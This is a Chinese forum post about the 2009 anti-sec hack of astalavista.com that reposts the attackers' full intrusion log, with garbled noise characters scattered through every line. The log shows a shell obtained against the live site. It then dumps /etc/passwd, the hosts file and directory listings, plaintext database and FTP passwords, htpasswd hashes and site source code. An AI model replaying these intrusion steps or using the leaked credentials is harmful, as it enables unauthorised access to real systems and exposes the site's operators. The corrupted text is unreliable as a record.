里面两个亮点,一是远程获得apache用户权限的shell,banner是LiteSpeed,看来这玩意有0day,但是又怎么是用apache用户跑的,原来LiteSpeed这东西是和apache绑一起的,大概看了下介绍,主要功能是anti-ddos,这东西貌似还有点意思,回头玩玩。具体的看链接标记[url]http://www.litespeedtech.com/litespeed-web-server-features.html[/url]。
0 P% H4 m+ c" Z0 x- q/ S- Z8 N
' p; V2 j- a: a0 A[root@front3 ~]# curl -I litespeedtech.com
/ s! b* Y+ d6 `# E/ @HTTP/1.1 200 OK
- ]& J$ f) C- I! ^$ }# ?" fDate: Fri, 05 Jun 2009 22:54:51 GMT+ G0 |: I$ g L# o% D0 u! c
Server: LiteSpeed
$ A! l; E3 E& L8 R+ i8 e# v0 P1 Q
" [6 a8 {/ V+ B" s9 h9 z另外一个亮点就是localroot了,如果不是udev的话,那么就是RHEL5.3 x64还有一个localroot 0day -_-$ f7 \! F- c. G
& U3 t: a$ u' \" z: b) l
有人说astalavista被黑是因为Y拿milw0rm的东西赚钱,这个我觉得就是每个人的尺度问题,有人还把别人写的文章弄成自己写的,还有人把别人的程序改成自己的,多了去了。/ T, O2 ^7 H F6 s- g# {: O# g
/ Q8 w8 b) R" M+ u
, w) j" @$ j; G% s! v# g/ _ \ / _____/\__ ___/ _ \ | | / _ \ \ / /| |/ _____/\__ ___/ _ \
; T2 h0 g m5 x/ /_\ \ \_____ \ | | / /_\ \| | / /_\ \ Y / | |\_____ \ | | / /_\ \1 Z2 w9 G: B: b3 w5 J+ \
/ | \/ \ | |/ | \ |___/ | \ / | |/ \ | |/ | \( H: P- c r6 F! d( w* R$ e# h
\____|__ /_______ / |____|\____|__ /_______ \____|__ /\___/ |___/_______ / |____|\____|__ /" _, }+ G! Z! Y4 n
\/ \/ \/ \/ \/ \/ \/
8 w$ c( S, z1 e5 X3 l: H) ~ The Hacking & Security Community
5 h7 v, q5 D+ A# E) c[+] Founded in 1997 by a hacker computer enthusiast
, B- o4 S W! H. T( I& X! |[-] Exposed in 2009 by anti-sec group
. u e2 r- Q% O! L u! u' \9 W
; O9 y, v2 Y/ e5 p3 H$ ]; XFrom < <b style=”color:black;background-color:#ffff66″>http</b>://<b style=”color:black;background-color:#ffff66″>astalavista</b>.<b style=”color:black;background-color:#ffff66″>com</b>/faq>:6 Z$ P$ Y# J# L' Z6 C
>> 03. Who’s behind the site?- h3 Y2 a1 X1 X. N. R
>>
6 Q! l& x" z" j: M>> A team of security and IT professionals, and a countless number of contributors from all over the world.6 V% D# N9 C" S
" s* ^5 s* q1 h+ o- n
>> 05. Is it true that the site is visited by script-kiddies and warez fans only?
! E) p( ^5 b6 i9 M6 `$ t>>
3 q& y J0 K; I& D9 L2 D>> Absolutely not! The audience behind the site consists of home users, worldwide companies and corporations, educational and non-profit organizations, government and
7 J$ b; ^ \1 A5 N$ G, imilitary institutions.2 I% l) O9 S. I4 E8 {& S
>> All of these have been visiting the site on a daily basis for the past couple of years, contributing in various ways, or requesting services and information.1 Q9 M5 e2 r3 i3 o5 T
8 d* s, m. L6 g8 k+ PWhy has Astalavista been targeted?
. j; E! C& r9 v+ Z3 i8 r
' M6 n# k7 H2 BOther than the fact that they are not doing any of this for the “community” but* D8 @5 ~- {2 K8 I) W( Z3 `
for the money, they spread exploits for kids, claim to be a security community- W( a5 C" d$ d. Y% b
(with no real sense of security on their own servers), and they charge you $6.662 s. A# x! Z d N: w0 k8 ]. I8 X
per months to access a dead forum with a directory filled with public releases
! p- O, D" R4 o& p3 F: Xand outdated / broken services.1 [! O8 j3 w$ u. g& B( K
; f, Z' Q$ L4 `# o7 u1 ?! n; {We wanted to see how good that “team of security and IT professionals” really is.
4 n) k0 v2 V7 t7 I) m4 e3 p9 A" l! Q
Let’s begin.
- V! K1 m( v% c
& N* d# n! v; yanti-sec:~# ./g0tshell astalavista.com -p 80$ I0 Z' F6 i5 m7 q( U0 i0 N: h
[+] Connecting to astalavista.com:80/ Z0 T5 u0 j- G
[+] Grabbing banner… `" ~& T9 i3 O) V; C
LiteSpeed
) M; O: K5 D2 e1 s; r[+] Injecting shellcode…
8 Z {* c' x3 s9 w; d[-] Wait for it5 h4 U# y' {+ b5 O; m5 K
4 F: g% e) X/ p! E. j9 _
[~] We g0tshell7 E% y+ |/ o# a( @+ z! @2 c
uname -a: Linux asta1.astalavistaserver.com 2.6.18-128.1.10.el5 #1 SMP Thu May 7 10:35:59 EDT 2009 x86_64 x86_64 x86_64 GNU/Linux
6 Z- O. U D0 ]- ]: y) A; jID: uid=100(apache) gid=500(apache) groups=500(apache)$ n# z2 W1 v2 [, A
/ D' [0 j4 {- c. R& H- d2 K
sh-3.2$ cat /etc/passwd q6 n; A P4 G5 J* I5 _& |" V
root:x:0:0:root:/root:/bin/bash: ~/ F# G# Z) t" K
bin:x:1:1:bin:/bin:/sbin/nologin
) h1 q1 S% Q" D9 K' }) M1 X# I0 Ddaemon:x:2:2:daemon:/sbin:/sbin/nologin+ p: O6 [) G& D& H
adm:x:3:4:adm:/var/adm:/sbin/nologin
! y/ H; a6 ]" p& l0 g' glp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
6 Z: W% Z$ k' Nsync:x:5:0:sync:/sbin:/bin/sync( D. W, t" ?" f& F0 e. C8 P
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown Q* Q; s# y2 B/ t+ m
halt:x:7:0:halt:/sbin:/sbin/halt
. H! Q$ M( c8 d2 V" C. jmail:x:8:12:mail:/var/spool/mail:/sbin/nologin6 Q+ j9 X2 X' T3 m4 W4 c
news:x:9:13:news:/etc/news:4 P8 @: T9 M2 t4 X5 b( t# F8 F5 \
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin" ^2 R# q; z; C9 @! z y# x
operator:x:11:0 perator:/root:/sbin/nologin O: n" r% V, L6 U
games:x:12:100:games:/usr/games:/sbin/nologin
- ^9 X( C: h% r1 w6 \. Tgopher:x:13:30:gopher:/var/gopher:/sbin/nologin: w* `' ?+ _5 T3 X
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin' m3 S) y2 k: ], h) H* P5 S9 |
nobody:x:99:99:Nobody:/:/sbin/nologin
$ c! b9 T, a" ]9 G5 Q7 @6 Crpm:x:37:37::/var/lib/rpm:/sbin/nologin, Z; J9 t# q+ k6 [
dbus:x:81:81:System message bus:/:/sbin/nologin+ u: M! C7 m% s# W9 D1 E) x7 N4 {, P
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin7 k6 y( U7 l ~+ ~2 I% e3 D
mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin( b# N6 @$ x# i( V, l8 R
smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
7 I& X1 q' Y/ l) u: P0 ovcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
4 `: Z% j( _7 w( Vhaldaemon:x:68:68:HAL daemon:/:/sbin/nologin' C5 o8 |1 ^% L7 Q6 d+ z) _
rpc:x:32:32 ortmapper RPC user:/:/sbin/nologin5 h4 H. l/ Y7 G8 A" U) d: \
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin8 \) {0 P% i- R
nfsnobody:x:4294967294:4294967294:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
, F1 C: y) f6 o6 ^: G9 ~( Lsshd:x:74:74rivilege-separated SSH:/var/empty/sshd:/sbin/nologin; n: K/ G# I! F2 ~6 \
pcap:x:77:77::/var/arpwatch:/sbin/nologin
4 L1 t$ N: i" R- g! B' C2 q# ]named:x:25:25:Named:/var/named:/sbin/nologin" w M, V% w3 w
apache:x:100:500::/var/www:/bin/false% T. p. _& M& M% S
diradmin:x:101:101::/usr/local/directadmin:/bin/bash
7 `' Z/ e a8 M" gmysql:x:102:102:MySQL server:/var/lib/mysql:/bin/bash
$ [2 J% y( S) K) ^# Owebapps:x:500:501::/var/www/html:/bin/bash
1 R* Y5 ?; x; y3 l) V( xmajordomo:x:103:2::/etc/virtual/majordomo:/bin/bash
: C) b. M2 i4 y8 H6 U, iadmin:x:501:502::/home/admin:/bin/bash" \5 Z3 j |4 u2 |4 |6 f. V9 n9 z
jon:x:502:503::/home/jon:/bin/bash
) V0 U( {( v. x0 v' T* tcom:x:503:504::/home/com:/bin/bash0 L( l! {5 I; ~ s
ntp:x:38:38::/etc/ntp:/sbin/nologin
. x: Q& A3 U5 xais:x:39:39penais Standards Based Cluster Framework:/:/sbin/nologin
+ `4 F( Y' o( ?& y& z; Castanet:x:504:505::/home/astanet:/bin/bash
: u4 K1 }; T# _* a* g4 i9 yavahi:x:70:70:Avahi daemon:/:/sbin/nologin! j( O. u* d% N
avahi-autoipd:x:104:103:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin
( h& l0 B7 q: F0 T: u0 m- p, f& X$ _- F9 S5 O
sh-3.2$ cat /etc/hosts
, _1 `* T7 ~3 O, ^& X: i# Do not remove the following line, or various programs; J" M1 c2 t1 D* e! q
# that require network functionality will fail.
1 J+ L1 C' d/ f. g" j0 ?8 a127.0.0.1 localhost.localdomain localhost
8 f: ?, U: m- L3 h/ m, H::1 localhost6.localdomain6 localhost6
# X1 B3 g. k/ @80.74.154.172 asta1.astalavistaserver.com" G: n2 ]- n( g& t8 l' e
8 W: r0 Z; F6 W' Csh-3.2$ pwd
: U+ Q6 S% w3 I2 S/home/com/public_html& ^2 \6 K9 q7 k+ M- j$ Z
( X4 b4 y8 T) j7 G, b3 u7 [+ |sh-3.2$ ls -la9 B- V4 }3 y, V
total 18460. O% y& ~( t0 P ]
drwxr-xr-x 30 com apache 4096 May 28 17:06 .
; ~/ y4 d- g7 o4 ^ C4 idrwx–x–x 11 com com 4096 Jun 25 2008 ..
6 ?7 k* X+ S/ F/ T9 n4 Vdrwxr-xr-x 2 com com 4096 Feb 2 19:29 admin
1 w; ?& l/ ]9 ]/ b/ r9 X$ Udrwxrwxrwx 2 com com 18591744 Jun 4 08:04 cache" D" A1 y9 y, X3 f' T7 C
drwxr-xr-x 6 com com 4096 Mar 28 21:17 cadmin
5 s- o e9 Q6 h7 O% K6 \# w o2 ydrwxrwxrwx 2 com com 4096 May 19 00:50 config" R$ N& [7 j" a Q# b) S% s+ U
drwxr-xr-x 2 com com 4096 Mar 20 11:05 core
2 @# B! }1 G: S# {' jdrwxr-xr-x 18 com com 4096 Feb 2 19:29 core_modules: @. i% }' U0 d+ R7 B2 [
drwxr-xr-x 4 com com 4096 Feb 2 19:29 customizing
0 h4 w/ j+ z( j1 U J& \* Udrwxr-xr-x 2 com com 4096 May 11 13:24 customizing_paulo, `+ J3 ~8 l W) s9 {
drwxr-xr-x 6 com com 4096 Mar 30 12:28 __DELETE__9 ?9 D6 ]" N4 d& K) Z
-rw-r–r– 1 com com 8035 May 19 14:26 directory_to_mediadir.php
+ ~- n, `4 m& B o' S8 q6 Wdrwxr-xr-x 2 com com 4096 Sep 9 2008 dvd
X7 p5 E+ P0 k% z4 b* ?8 o$ |( ~drwxr-xr-x 3 com com 4096 Feb 2 19:29 editor: p5 P/ @; z9 }
-rw-r–r– 1 com com 3750 Feb 27 16:12 favicon.ico! I0 ^/ Y1 e. Q
drwxrwxrwx 2 com com 4096 Jun 4 08:00 feed
}! a& X, p! j$ ? d/ @7 _-rwxrwxrwx 1 com com 10736 May 29 12:44 .htaccess! a1 U# ?7 j" ]8 ^2 d
-rw-r–r– 1 com com 7638 Apr 21 08:45 .htaccess.2009-04-21.bak
# V- \ b. T; x" N s- N-rw-r–r– 1 com com 10768 May 11 11:53 .htaccess.2009-05-11.bak
3 s9 [, [+ l" \7 e+ O* adrwxr-xr-x 18 com com 4096 Apr 9 2008 ideapool/ U8 x& o5 |5 L* ?
drwxrwxrwx 14 com com 4096 Feb 2 19:29 images4 }# m4 g+ V, U5 u& V6 y. x0 D
-rw-r–r– 1 com com 97496 Jun 2 13:01 index.php
: B# {, K5 U. l) ~drwxr-xr-x 6 com com 4096 Feb 2 19:29 installer% S- g& B& w$ B3 Q7 J) ]: h0 `! H. Y
drwxr-xr-x 8 com com 4096 Feb 2 19:29 lang
% K8 U; D0 {5 K$ U- n* V3 xdrwxr-xr-x 22 com com 4096 Feb 2 19:29 lib
9 b Z% l7 p' h: d; Wdrwxrwxrwx 12 com com 4096 Jun 2 07:47 media
: f- |9 c" V" |( Z/ [drwxr-xr-x 8 com com 4096 May 11 12:48 modifications) `0 U; V7 ]( T7 J
drwxr-xr-x 34 com com 4096 May 28 16:30 modules: @0 C: u' \6 U. P' O- C# W
drwxr-xr-x 11 com com 4096 Jan 30 15:00 _myAdmin
: j# c' N4 n$ z# ?1 J3 D3 Jdrwxrwxr-x 22 com com 4096 May 28 17:06 _new
1 G* O; W" @( rdrwxr-xr-x 26 com com 4096 Feb 2 19:27 _old1 P, q6 f3 I' p4 _ Q9 w
drwxr-xr-x 2 com com 4096 Mar 30 12:29 phproxy& {9 g8 f1 H N$ V3 b
drwxr-xr-x 2 com com 4096 Mar 30 12:30 proxy# l3 @5 d5 ?+ v. g8 O
-rw-r–r– 1 com com 26 Feb 2 19:33 robots.txt
9 U I7 [2 `9 o h-rwxrwxrwx 1 com com 10844 Jun 2 09:50 sitemap.xml
0 W, Y1 ^% g2 \/ Z& F* o+ T6 s-rw-r–r– 1 com com 223 Mar 30 15:32 test.php' W. ] N: S8 e5 H; _3 e- d
drwxrwxrwx 8 com com 4096 Mar 6 13:15 themes
& E2 F7 w. t2 U5 }, j6 ]6 V0 Udrwxrwxrwx 3 com com 4096 Jun 4 08:00 tmp
* ?' C+ ?5 S( S D: I' k' L' Vdrwxr-xr-x 3 com com 4096 Feb 2 19:33 webcam
) M7 K# t! d- T- B4 q' y2 c1 z
& I7 k! f% T" Z f- a1 ]sh-3.2$ head -20 index.php
2 S5 ^. T9 J- {! e; h7 j<?php+ L% O3 Y- J6 c3 I' }
! H" R( D k0 h/**
0 V, Q) g+ }- |* e- L0 F/ y2 H$ U* The main page for the CMS
+ Q$ h% w& g4 i0 Z* q. c7 C" r* @copyright CONTREXX CMS - COMVATION AG: F( @. g' Y4 V: S
* @author Comvation Development Team* x% L# u+ j/ z7 k
* @version v1.0.9.10.1 stable- O0 Y0 W' @! u& e: U4 j
* @package contrexx
3 w1 f4 ^7 R' c) T) P6 S2 I6 z! Q* @subpackage core" D; i" H# }$ p, k$ r0 K
* @link 链接标记[url]http://www.contrexx.com/[/url] contrexx homepage% l6 a1 f6 r2 C% a8 ]! ?* Z
* @since v0.0.0.0
& I# ?; F ~2 {5 f& } p+ \" g; D* @todo Capitalize all class names in project9 }3 P. o; o7 N1 v) Q8 X
* @uses /config/configuration.php, i' r" N/ A) }( c8 K" {
* @uses /config/settings.php' o& v! |& y% z- z K5 u1 ~6 o
* @uses /config/version.php
! r0 `! r1 t: v9 ]* @uses /core/API.php
( D/ }; F q1 O7 s: V Z5 [* @uses /core_modules/cache/index.class.php
0 d( Q+ V$ ?; Q' ]* @uses /core/error.class.php
! L3 g( c- e7 N) k* @uses /core_modules/banner/index.class.php
& c0 \( t' x2 e5 H, Z8 j- ?/ U* @uses /core_modules/contact/index.class.php
; D0 v, [/ \. X
8 q9 f1 d5 `0 k9 z L( Q3 g" tsh-3.2$ cd config/
# J5 ^- ~% K3 U4 ?. Dsh-3.2$ ls -la) L- W- K- H' o8 V2 U5 f4 Y7 R/ A
total 329 }, P4 O: D! f
drwxrwxrwx 2 com com 4096 May 19 00:50 .- o& Y0 F4 U9 J+ c. B# z! J5 `
drwxr-xr-x 30 com apache 4096 May 28 17:06 ..
- P" C$ O3 P2 V-rwxrwxrwx 1 com com 2998 May 11 12:29 configuration.php
5 ^2 {* |. g! S# F: K z+ Q% o, W: X-rwxrwxrwx 1 com com 7610 May 28 17:27 set_constants.php$ ~$ ?" }6 Q( ?- d* i- Z
-rwxrwxrwx 1 com com 4186 May 25 12:54 settings.php
1 X& u/ L6 P# {* X* u0 U+ J8 Z-rwxrwxrwx 1 com com 672 Feb 2 19:29 version.php
9 v& V- [0 i2 A" s
5 a' K0 Z" i: Q/ }& ysh-3.2$ cat configuration.php0 \ ~1 P$ V" d [7 Q1 z7 O
[snip]
4 o. j1 n" ^4 v9 D, C$_DBCONFIG['host'] = ‘localhost’; // This is normally set to localhost, z- e% k c: L% B7 p9 A9 [
$_DBCONFIG['database'] = ‘com_contrexx2_live’; // Database name
, z% t( D# k4 f$ |; @$_DBCONFIG['tablePrefix'] = ‘contrexx_’; // Database table prefix
. U; c. E- J% L% m5 @$_DBCONFIG['user'] = ‘contrexxuser2′; // Database username0 @) q2 U0 H. T: c7 y- T" u
$_DBCONFIG['password'] = ‘0fEYNZgXz1pKe’; // Database password) X. ]2 C- V3 o
$_DBCONFIG['dbType'] = ‘mysql’; // Database type (e.g. mysql,postgres ..)
, u0 ^( u! w6 a3 U$_DBCONFIG['charset'] = ‘utf8′; // Charset (default, latin1, utf8, ..)' y) \- B5 y+ S+ z+ [: q
[snip]2 [" N7 ~6 X3 V+ J1 E, i' B
$_FTPCONFIG['is_activated'] = true; // Ftp support true or false
' c% j! C9 ~( U1 R" n T$_FTPCONFIG['use_passive'] = true; // Use passive ftp mode8 H* k- q' v {: s1 W5 S
$_FTPCONFIG['host'] = ‘localhost’;// This is normally set to localhost+ v5 \9 o! |6 v* D
$_FTPCONFIG['port'] = 21; // Ftp remote port$ G* n; u# L$ O
$_FTPCONFIG['username'] = ‘链接标记dev@astalavista.com’; // Ftp login username
+ t- {8 }! X# i5 a- G$_FTPCONFIG['password'] = ‘jajklop0Iuj’; // Ftp login password- I( x- U3 C# {8 z
$_FTPCONFIG['path'] = ‘/’; // Ftp path to cms
* G# |6 }( [% T" V/ g1 W# [: ^4 B9 x; [) I1 X
sh-3.2$ cd ..
: {5 g6 J) [7 z) {7 Esh-3.2$ cd dvd/3 J8 u$ a, u7 [
sh-3.2$ ls -la7 X, x- ]6 b" J
total 2913780' \' G) q# Y% Y$ I
drwxr-xr-x 2 com com 4096 Sep 9 2008 .! O B7 J2 x& i2 O& Z S" o
drwxr-xr-x 30 com apache 4096 May 28 17:06 ..
) u- T' h/ h* Y" }$ V-rw-r–r– 1 com com 1050061483 May 16 2008 astalavista_security_toolbox_dvd_2008.part1.rar; @( x1 ~* W+ U5 j8 z
-rw-r–r– 1 com com 1050061483 May 16 2008 astalavista_security_toolbox_dvd_2008.part2.rar4 o8 @9 V# ]. u' D
-rw-r–r– 1 com com 880644069 May 16 2008 astalavista_security_toolbox_dvd_2008.part3.rar
7 y: Q B7 {$ S8 \7 u. p* A1 ]$ ^6 d9 M-rw-r–r– 1 com com 115 Jan 29 2008 .htaccess
/ d0 E* j- f- W& l7 Z- A6 t
/ J# d1 U+ h* q* Lsh-3.2$ cat .htaccess
/ ?, n$ \4 l8 `# j* L" ~7 xauthType Basic
A6 c1 h' L' H6 W2 cauthName DVD
6 z- u7 X! H$ d: M1 _# W. K# ?* j0 IauthUserFile /home/com/domains/astalavista.com/.htpasswd/.htadm_pwd
4 I: \/ g+ ]# r- n: ]( Irequire valid-user
" X' K( I3 a F
/ t, ]. E2 i! Bsh-3.2$ cat /home/com/domains/astalavista.com/.htpasswd/.htadm_pwd
7 x- k2 t6 n% a! }, h8 o4 WDVDdownload:CRD8cuY6.MPT6
- ]! l+ _, t: |' Q$ b/ O( o4 gDVDdownload2:CR8a36.wluFMg! B# N! o. ^3 N4 W6 C* j$ T2 `' G
$ L1 `0 F( e' H4 Z) s, ksh-3.2$ cat test.php
4 h: i: g0 b2 L' S4 y# c8 P1 D<?php3 G& v( x" ?/ y+ A
$url = ‘aHR0cDovL2kubnVzZWVrLmNvbS9pbWFnZXMvdGVtcGxhdGUvMzYweDMxOC9pc3QyXzc0Njc4MV9mZW1hbGVfc3R1ZGVudC5qcGc%3D’;) B2 B( d' U/ O7 V: l& S
$url = str_replace(array(’&’, ‘&’), ‘&’, base64_decode(rawurldecode($url)));
& A0 l' T5 |% @# Z( Lecho $url;
6 i) K& b: |8 j* |3 l?>/ u5 g: [2 {3 S8 q' F- ~1 i; f
% u3 O; i% m5 b8 s
sh-3.2$ cd modifications/
' |# w3 t8 X2 B' h' _sh-3.2$ ls -la# n8 o O' |3 @$ U3 t
total 32. c- e4 T- r8 ~. p2 T
drwxr-xr-x 8 com com 4096 May 11 12:48 .& L7 J! [% f }9 n" D. D
drwxr-xr-x 30 com apache 4096 May 28 17:06 ..# _: d" B& _+ U) ~
drwxr-xr-x 3 com com 4096 Feb 2 19:33 com_avtng
7 ?2 J: L. z! B' ydrwxr-xr-x 3 com com 4096 May 12 09:26 cronjobs
4 @1 `# ?' S: y. Ldrwxr-xr-x 2 com com 4096 Mar 2 10:35 onlinetools
0 [) [9 I& H6 F8 bdrwxr-xr-x 4 com com 4096 Feb 2 19:33 pjirc9 S( P" r4 c1 q8 b: t! |& Y4 @
drwxr-xr-x 2 com com 4096 Feb 2 19:33 search# t# n* Y2 i5 k$ @8 T8 s9 U
drwxr-xr-x 2 com com 4096 Mar 25 08:56 _tmp
- D8 }! F& u5 Y8 L( E7 ?% X, p9 O% O: w
sh-3.2$ ls -R* P+ F' E( p n) ?
.:
3 A9 F+ W% ?) z& |9 `/ y) d2 F/ xcom_avtng cronjobs onlinetools pjirc search _tmp
5 \2 }0 f4 {4 N6 [
: X4 A7 d ~2 b' u, V./com_avtng:
: P# G; [" ?% A& h% Mavtng.php banner_bottom.inc.php banner_button.inc.php banner_content.inc.php banner_popunder.inc.php banner_right.inc.php banner_top.inc.php iframe.php scripts
; N c+ t7 O' @6 i/ [) h! O! s, S# G7 N4 L2 ` V% F
./com_avtng/scripts:- A. s9 m+ V8 h3 U* x; U" X( G
popunder.js
, P5 C1 f9 O8 _( t$ T
5 ]8 h( u/ w k+ G0 g( _./cronjobs:+ ?9 L- F; s6 Z0 V* y
exploits.php exploits.sh google_blogindexing.php ip2country.sh proxydb2.php proxydb.php securitynews.php tmp2 h% D) H7 p' p" O7 X9 J
) W7 x" h+ \8 G7 G) |- u$ W. O
./cronjobs/tmp:
, }% m7 F8 ~" ~contrexx_module_onlinetools_defaultports.csv contrexx_module_onlinetools_geolitecity_country.csv( l6 u; k" p& @' v! a7 T
7 M2 b( I" X% f; z& Z% [2 ?./onlinetools:) t% S$ ^9 y4 x# r
index.php, ?. L8 L" X! ]) K. |; }' j/ |
5 I# @/ l: H& E9 M( E( D, U
./pjirc:
2 }5 y3 {9 b( D1 ]" ~a_big.jpg english.lng img irc.jar NormalApplet.html pixx-french.lng pjirc.cfg securedirc-unsigned.cab thanks.txt* |. l6 M3 F: Y3 `
AppletWithJS.html french.lng IRCApplet.class irc-unsigned.jar pixx.cab pixx.jar readme.txt SimpleApplet.html versions.txt
$ R6 s! i. |: B9 e8 U" Y6 Ybackground.gif HeavyApplet.html irc.cab license.txt pixx-english.lng pixx-readme.txt securedirc.cab snd7 }8 A+ E1 u+ I( t* O0 |
5 t- p+ j' ]6 Y& B# j; \, W& h R& g
./pjirc/img:9 L5 b1 l0 f& Y4 j# _8 s7 |
ange.gif bombe.gif clin-oeuil.gif content.gif enerve2.gif garcon.gif langue.gif mecontent.gif ordi.gif portable.gif sapin.gif triste.gif! D/ n W% @4 z
arbre.gif bouche.gif clin-oeuil-langue.gif cool.gif femme.gif grognon.gif lettre.gif newbie.gif pere-noel.gif pouce-non.gif sleep.gif
0 Z7 n6 e6 M ~2 Q" K/ v pverre-eau.gif
. C$ J3 C0 H$ {& A1 hargh.gif bouqin.gif coeur-brise.gif diable.gif fille.gif halloween.gif lit.gif OH-1.gif pleure.gif pouce-oui.gif soleil.gif
0 V; y- k! c! J% g% q9 I2 h- |verre-vin.gif; b1 ?. i# J. I" ~. b$ }$ x
ballon.gif cadeau.gif coeur.gif dwchat.gif fleur.gif hamburger.gif love.gif OH-2.gif poisson.gif roll-eyes.gif sourire.gif yinyang.gif
7 e+ x( k2 W5 r8 Z1 lbiere.gif chien.gif comprends-pas.gif enerve1.gif fume.gif homme.gif lune.gif OH-3.gif pomme.gif rouge.gif terre.gif
! a' B+ c0 b. B! l z
0 z7 D9 q, X0 T. g# [' ^./pjirc/snd:
1 Y2 A% k" R, i: obell2.au ding.au; g8 ]/ K5 k2 q$ K5 x J
* S, z% D2 e% `9 a+ C8 O
./search:
3 f0 q9 ^: p6 L* N0 bsearchEngines.php search.php
! f C/ B, V" P% Y" g. e8 U4 ~ P, J
/ M, i' o/ p. U/ W1 n! n6 n N./_tmp:
* w6 d- L/ `: ?defaultPorts.php defaultPorts.txt4 o- O5 c) l6 e6 J* @
+ a4 e/ M; [* Z( d* H% Q) V8 [
sh-3.2$ cd cronjobs/& C2 H) `" B m) l: j4 m
sh-3.2$ cat exploits.php
6 L% a8 B3 f# t" h; e* E7 B5 J[snip]/ F' a4 W' N: X$ G8 R+ P% |
$categories = array();; W, b; Q+ V1 l: r" A1 o
$milw0rmFile = FULLPATH . ‘/modifications/cronjobs/tmp/milw0rm/sploitlist.txt’;
; \' _0 E) l6 t1 t) z+ M$expolits = file($milw0rmFile);
! ~2 e. M) i% z( k6 T( d$comExploits = array();
8 ^4 t, n5 { A5 c8 }[snip]' F5 L2 N1 n( U: X+ W( n
// manage data$ F* `# m5 b9 I
for ($x = 0; $x < count($expolits); $x++){ // count($expolits) - 26407 X7 [4 G" L0 u" e
2 Z4 S5 y1 u7 q% a% l( h // get path and title
3 P8 A0 l& W) A $expolits[$x] = trim($expolits[$x]);
4 O) c9 d9 D9 W# F) ]+ c $path = str_replace(’./’, FULLPATH . ‘/modifications/cronjobs/tmp/milw0rm/’, substr($expolits[$x], 0, strpos($expolits[$x], ‘ ‘)));
0 K5 Z j; }: ^/ {: Y& f t $title = htmlspecialchars(substr($expolits[$x], strpos($expolits[$x], ‘ ‘) + 1, strlen($expolits[$x])), ENT_QUOTES);6 Q4 N. e" o3 G: A5 w0 W, J
; v: X2 G7 j* ?' U- N
// check if file exists% t( L I$ J9 r
if (file_exists($path)) {
7 d( N: G# n7 |' e. Y+ L# c- N# D2 [; V+ a
$text = file_get_contents($path);
1 u2 W) E7 j: P& y; a1 {9 h" t4 ], B$ ?5 Q0 q1 S5 q1 a) P
// get content and date
1 J' o6 M6 P$ j# X( u/ y. R! ` //$text = htmlspecialchars($text, ENT_QUOTES);
; k+ w. W9 m9 g% F $tmptext = addslashes(htmlentities($text, ENT_QUOTES, “UTF-8″));
/ P" m9 O: S \4 ]- e) a8 r if ($tmptext != ”) {
c q& A. A2 {- G7 w. U $text = $tmptext;& Q* I& l$ q7 ?1 Q
} else {
+ A% f: R; A+ w' y1 t3 m, S $text = addslashes(htmlentities($text, ENT_QUOTES));! H% v" u: I' Y
}6 b, C4 S/ g* ?% R0 y! l6 z
$date = str_replace(’milw0rm.com [', '', str_replace(']‘, ”, strstr($text, ‘milw0rm.com [')));
' c6 P" d5 }+ t: x7 Z5 } $tmp = explode('-', $date);
, x# Q. ?0 L/ Q8 c" m $date = mktime(0, 0, 0, trim($tmp[1]), trim($tmp[2]), trim($tmp[0]));+ V- X5 r# j2 S; O% }$ d6 @
$cat = getCategory ($path);. j: O4 y: g' O r
$ext = pathinfo(basename($path));5 c4 i( T! ]4 F- C) S. a# s
$ext = $ext['extension'];' S6 w! [; p( \0 j4 W
$qStr = ”
/ l0 i4 W; e/ M/ P4 y9 P, C+ j- } SELECT `id`+ {$ H+ t, r( t
FROM `contrexx_module_exploits`
0 ^, W0 { R' I. s WHERE `title` = ‘” . $title . “‘
6 J$ E5 U9 N- \4 a AND `date` = ‘” . $date . “‘; a; P W T% K+ O* k- Y# d
“;
9 Z" `1 |2 a8 P/ x* t echo $x + 1 . ‘ von ‘ . count($expolits) . ‘ -> ‘ . $qStr . “\n”; g, E' y$ O( t K& T$ L: v) i
$q = $_objDB->query($qStr);2 r3 M/ T- R1 l* {
, U4 x! x5 u1 S2 n' | if ($q->numRows() == 0) {
" O7 |- Y% y Z* W) {1 K1 D
9 D. H' A7 X* M5 `; h // prepare array
2 x1 a4 x' E5 ?) v: r5 i' i $comExploits[$x]['date'] = $date;/ Y+ S o9 S" Y& t" _7 l# w0 u
$comExploits[$x]['title'] = $title;# ]# O P7 k& ]: y+ e
$comExploits[$x]['author'] = ‘milw0rm’;( N' M) g+ E# v+ h) Z. T2 V
$comExploits[$x]['text'] = $text;8 p3 p0 P' q0 y! `0 ]1 h9 o- j7 [/ w
$comExploits[$x]['source'] = $ext;
& o& m0 x4 u i/ X$ W $comExploits[$x]['url1'] = ”; f K+ |# a. q8 a$ t& L5 ]/ }
$comExploits[$x]['url2'] = ”;
% b( g" z8 ^2 y; K7 {+ }5 X $comExploits[$x]['catid'] = $cat;) S! f, z j- [
$comExploits[$x]['lang'] = ‘2′;' T# i* l% l, {4 J7 M
$comExploits[$x]['userid'] = ‘12′;+ Y/ J0 F9 `" f
$comExploits[$x]['startdate'] = ‘0000-00-00′;
5 g6 ]: E/ W! q! [ $comExploits[$x]['enddate'] = ‘0000-00-00′;+ F: U& E6 y1 {8 ?- i6 F! ~
$comExploits[$x]['status'] = ‘1′;' u7 P( O6 K/ @9 g+ G- S2 d+ n* p
$comExploits[$x]['changelog'] = $date;
& y% ^+ N8 ] g1 J1 Z
1 L; @% c/ J. A8 v O, p }# C* Z! M6 g) X3 i( D
[snip]
3 n7 X/ a; q$ v1 @5 N6 n $xml = ‘<?xml version=”1.0″ encoding=”UTF-8″?>" C& N6 e. T. D- ~
<rss version=”2.0″>
9 V; _% ]# L9 L+ W" j9 T0 D4 h! Y8 q; ^ <channel>8 Z9 w5 g( C( I7 \3 h7 n. w6 N
<title>ASTALAVISTA.com - Exploits</title>4 q; B* o5 D! }( d9 O3 Z/ [* f4 P
<link>http://www.astalavista.com/exploits</link>
